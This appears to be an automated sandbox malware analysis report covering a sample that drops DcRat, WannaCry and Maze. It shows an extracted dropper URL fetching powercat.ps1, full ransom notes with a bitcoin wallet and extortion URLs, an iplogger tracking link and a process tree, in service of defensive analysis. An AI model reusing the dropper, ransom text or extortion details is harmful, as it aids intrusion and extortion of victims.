Analysis

  • max time kernel
    157s
  • max time network
    165s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    23/03/2022, 21:00

General

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://192.168.5.128/powercat.ps1

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\@[email protected]

Family

wannacry

Ransom Note
Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94 Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �
Wallets

13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94

Extracted

Path

C:\DECRYPT-FILES.txt

Family

maze

Ransom Note
Attention! ---------------------------- | What happened? ---------------------------- We hacked your network and now all your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms. You cannot access the files right now. But do not worry. You can get it back! It is easy to recover in a few steps. We have also downloaded a lot of private data from your network, so in case of not contacting us as soon as possible this data will be released. If you do not contact us in a 3 days we will post information about your breach on our public news website and after 7 days the whole downloaded info. To see what happens to those who don't contact us, google: * Southwire Maze Ransomware * MDLab Maze Ransomware * City of Pensacola Maze Ransomware After the payment the data will be removed from our disks and decryptor will be given to you, so you can restore all your files. ---------------------------- | How to contact us and get my files back? ---------------------------- The only method to restore your files and be safe from data leakage is to purchase a unique for you private key which is securely stored on our servers. To contact us and purchase the key you have to visit our website in a hidden TOR network. There are general 2 ways to reach us: 1) [Recommended] Using hidden TOR network. a) Download a special TOR browser: https://www.torproject.org/ b) Install the TOR Browser. c) Open the TOR Browser. d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/6c2b0cc8f1b719ac e) Follow the instructions on this page. 2) If you have any problems connecting or using TOR network a) Open our website: https://mazedecrypt.top/6c2b0cc8f1b719ac b) Follow the instructions on this page. Warning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. On this page, you will see instructions on how to make a free decryption test and how to pay. Also it has a live chat with our operators and support team. ---------------------------- | What about guarantees? ---------------------------- We understand your stress and worry. So you have a FREE opportunity to test a service by instantly decrypting for free three files from every system in your network. If you have any problems our friendly support team is always here to assist you in a live chat! P.S. Dear system administrators, do not think you can handle it by yourself. Inform leadership as soon as possible. By hiding the fact of the breach you will be eventually fired and sometimes even sued. ------------------------------------------------------------------------------- THIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU ---BEGIN MAZE KEY--- siyl05x/b0jl1CClVqjmPLrnHJrkP4XVYht2mQt9BpVC/5M6VvrQTL6l6soKs6THTDW66u/QmNH9Pk+Pi0lYLTciuF28iPn2wLYxNi90MO1cdxocATXAspaxvYDLCLR4VVTwiCRh8MFIdxxJtKfqRBUsr1Sh2hbCvX86XtIolwNQwPsWPrgLNc92GYXvljEd2qBOxZric+OCa10fSht9VlyURdQQSaSSLcqvidDrSSJUFiyB4atFMLYb/mXIxQuoVRMnE+KhzrvqdvwqIUaTgtGfo6DKl/g9zseNBp04ZUU2kSOY+zHOzJp2tv8utytnKbkwukb5Vz3Wv4MMpFZKk4n29DokTXA4h9Xf9Asv4bK3myAk7Vid16oO5+Y5FUuAuShQKrgNS6tuDeZ0U9LtHijddIzyaufL7SPamukzDWDX5Mr9IlacZZbI9DvEeu2VyAQXUjwVAkyV97c2tkjtjFn938qDsIfCZ5/BpmU/+CO/qBC73U1tdEScMZTLGh5y5ypIcQrGqG23g1k6lzVnuFZrZn5U1MISB4X5uynqj0XxW0JUIX3KiinB+g0xdY/jgENrclGIvFP0Jur9UPh2XaLOnCVpbaYJOu/wxVcFlFMp+OUgEHb0PCUB+vZnFWgM0v2KQUFWnuU+OGMEFSDjWOw6SEnHa31XEsnBdTgsEb6OZhquXcSFe3QRZkZUOKgViA5UDVn6kd7iteCNujZ877586ils4rXcgeQHHc23oq2q+LE12lFlcAA3WcZxELC5+zfgRjYtUY5iXjlI2fCLdNwNFebHCFxrm1Y2PGtrifnKGz8Xe+1YDsaMLu1vmQ+ZR4Z9qa3GUyljxeZ7HjtAcAsZ0Yrkt13p45bEC2e5Zz5elOTvSB33sP68E4xPm2Sj6bgixHudecLB2qNDxL57/gTuT1T99nrccMSIz7BtchhbktqjZzNOeiEIAjj50q1hq36M/veaQYqynFK6w5Y8cd5KMAkEt3XuiDLq52ipTgkm8qWk8UurVw3rCJ+wqnruUQyfvQmd1mYJOHcC+lDopkV3iIRLMv/8RnarNElk5GQLwuH4LNuavMCWyYO9XwJiQr7k36al5LuMx5f9MVyb+rmFnBESizOBjGLOOr0d2H89JoxWTfn/AqpH1GFRodUfhP7G4EVQ0/nWEVcRvA4q4iu/RGig1tZm31Lset1Wp6uV3Ae99l2oE0cFVbEK7Fqd3VSQRdA1V97W+MUJBOBMoRaAhF0h/hlWYkgeB410Q9cEYv1P63UvAjAmFJ+9eyUj7YNlmRrgD7rMf/9SSxTb650M9RUP5R8gOsbgMTAnULKvIJwjazQvUo/Zd14wyEafUEdJ9iY2xb3xwjAjcb2kG0L+JM4GokGcNJ7alUruO2oR4u3tndHkPG53uBA1b0oGajIfeUeOTI/mcesmOaPU53UgPKEulFYo+DsUt+gKDK/p34eOcXW8NnfHrmDX6JaPgMsnKdvqlGVL6mbSTgYqeBnMGevmluKGEmh7Rj7lXyiVowSCbLe5iKKN10FZ/13duJvMrzgwWI2+KPQANB0RaWuq04wUjZp6qsSyXec44P6wfGkPmtjy8SAK23+r5TcWjJ9saie/asI1zPn6hngNHUBhC5D+GyWtFsP/qZTK0NMiRJE+D4XQ3ktNpx4ccHK+IziVbmN9YrV4boM8UriJqwLHMqJqqqWT3c5szwOan/4MzBTeieK43e1g1BXlzSOtMqQ9Mf0plG9Nro3SBWiTteBunYGIaVQSDXo7Mmowb/6d0K2/+zPTAD5BlD2JztgSOWcbXT2o5ye2Ng425e4nRu8DzhIyAYV4ydbLmdv3jXm7JlW4ttil/bHkOUJm2cyO3XeYvmNQHu83cXKwRW4DMY5lszd8ZVVYLQwuj8RDAWkSbjsJOsH4krgYplVa4EvIZCscph5lSYBXxtEXdOGmX4pPA+CkaIB2f9GjTQXcfG6NvUIMeKiPvVte61jm/oEl+8pIX4Bv7MjitNfxOgM1z0T+EMdONx2GM5aJDhPM257O0tXhGHwbhhEnWXgJma0U/4iauX15EN4pVAGDAoopYgLBTyyx9hR23hxTpmT0oVaAe0J8yYdg0KpJwwjdxRIMlimdub+L2yiteYll/UWxQSXuQ9gOSoJ1P7u0Ov4JpECn/XF2HbORubJfvi3/ZZqZ56MVcwqOxP4t0T4TznPfXM7Ko8TSC7Bv/MMmbiESJ+U0DFB3aBQHmRK7Q1T8lkjB0yhStAoiNgBjADIAYgAwAGMAYwA4AGYAMQBiADcAMQA5AGEAYwAAABCAYBoMQQBkAG0AaQBuAAAAIiZXAE8AUgBLAEcAUgBPAFUAUABcAEoARABRAFAAWABPAFAAUgAAACoMbgBvAG4AZQB8AAAAMixXAGkAbgBkAG8AdwBzACAAMQAwACAARQBuAHQAZQByAHAAcgBpAHMAZQAAADoofABkAGUAcAByAGUAYwBhAHQAZQBkACAAPgAgAHYAMgAuADMAfAAAAEI2fABDAF8ARgBfADIAMAA0ADUANAAvADIANgAxADgANAAxAHwARABfAFUAXwAwAC8AMAB8AAAASABQQFiJCGCJCGiJCHDPkrgOeAyAAQGKAQUyLjMuMQ== ---END MAZE KEY---
URLs

http://aoacugmutagkwctu.onion/6c2b0cc8f1b719ac

https://mazedecrypt.top/6c2b0cc8f1b719ac

Signatures

  • DcRat 21 IoCs

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Maze

    Ransomware family also known as ChaCha.

  • Process spawned unexpected child process 15 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • UAC bypass 3 TTPs
  • Wannacry

    WannaCry is a ransomware cryptoworm.

  • suricata: ET MALWARE DCRAT Activity (GET)

    suricata: ET MALWARE DCRAT Activity (GET)

  • suricata: ET MALWARE Maze/ID Ransomware Activity

    suricata: ET MALWARE Maze/ID Ransomware Activity

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Executes dropped EXE 13 IoCs
  • Modifies extensions of user files 4 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 12 IoCs
  • Loads dropped DLL 9 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 17 IoCs
  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in System32 directory 3 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 3 IoCs
  • Drops file in Program Files directory 49 IoCs
  • Drops file in Windows directory 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 9 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 14 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 12 IoCs
  • Modifies registry class 3 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 38 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SetWindowsHookEx 25 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rip.bat"
    1⤵
    • DcRat
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4880
    • C:\Users\Admin\AppData\Local\Temp\1.exe
      1.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:5104
      • C:\Windows\system32\cmd.exe
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\AA58.tmp\AA87.tmp\AA88.bat C:\Users\Admin\AppData\Local\Temp\1.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4604
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/2bB2s6
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1220
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff81a5046f8,0x7ff81a504708,0x7ff81a504718
            5⤵
              PID:4172
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,14038481803023492421,9768421630712696300,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:2
              5⤵
                PID:4064
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,14038481803023492421,9768421630712696300,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:3
                5⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:3832
        • C:\Users\Admin\AppData\Local\Temp\1.exe
          1.exe
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:5116
          • C:\Windows\system32\cmd.exe
            "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\AA47.tmp\AA48.tmp\AA49.bat C:\Users\Admin\AppData\Local\Temp\1.exe"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4612
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/2bB2s6
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:4444
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff81a5046f8,0x7ff81a504708,0x7ff81a504718
                5⤵
                  PID:4512
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,17819899355196799753,13614699943647842470,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2
                  5⤵
                    PID:3924
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,17819899355196799753,13614699943647842470,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3
                    5⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2996
            • C:\Users\Admin\AppData\Local\Temp\1.exe
              1.exe
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:4028
              • C:\Windows\system32\cmd.exe
                "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\AA57.tmp\AA77.tmp\AA88.bat C:\Users\Admin\AppData\Local\Temp\1.exe"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:4624
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/2bB2s6
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4756
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff81a5046f8,0x7ff81a504708,0x7ff81a504718
                    5⤵
                      PID:2976
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,17158845095647533318,10512177733253086354,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2
                      5⤵
                        PID:1096
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,17158845095647533318,10512177733253086354,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3
                        5⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:5112
                • C:\Users\Admin\AppData\Local\Temp\1.exe
                  1.exe
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3060
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\AB51.tmp\AB61.tmp\AB62.bat C:\Users\Admin\AppData\Local\Temp\1.exe"
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4632
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/2bB2s6
                      4⤵
                      • Adds Run key to start application
                      • Enumerates system info in registry
                      • Modifies registry class
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of WriteProcessMemory
                      PID:1388
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff81a5046f8,0x7ff81a504708,0x7ff81a504718
                        5⤵
                          PID:2876
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2
                          5⤵
                            PID:1088
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3
                            5⤵
                            • Suspicious behavior: EnumeratesProcesses
                            PID:460
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2688 /prefetch:8
                            5⤵
                              PID:976
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1
                              5⤵
                                PID:5208
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
                                5⤵
                                  PID:5388
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3964 /prefetch:1
                                  5⤵
                                    PID:5552
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4564 /prefetch:1
                                    5⤵
                                      PID:5784
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4204 /prefetch:1
                                      5⤵
                                        PID:5600
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4724 /prefetch:1
                                        5⤵
                                          PID:5856
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6092 /prefetch:8
                                          5⤵
                                            PID:3500
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6336 /prefetch:1
                                            5⤵
                                              PID:5520
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5576 /prefetch:1
                                              5⤵
                                                PID:6184
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6172 /prefetch:1
                                                5⤵
                                                  PID:6200
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6936 /prefetch:1
                                                  5⤵
                                                    PID:6256
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6864 /prefetch:1
                                                    5⤵
                                                      PID:6308
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6684 /prefetch:1
                                                      5⤵
                                                        PID:6344
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6800 /prefetch:1
                                                        5⤵
                                                          PID:6364
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7132 /prefetch:1
                                                          5⤵
                                                            PID:6392
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7308 /prefetch:1
                                                            5⤵
                                                              PID:6504
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
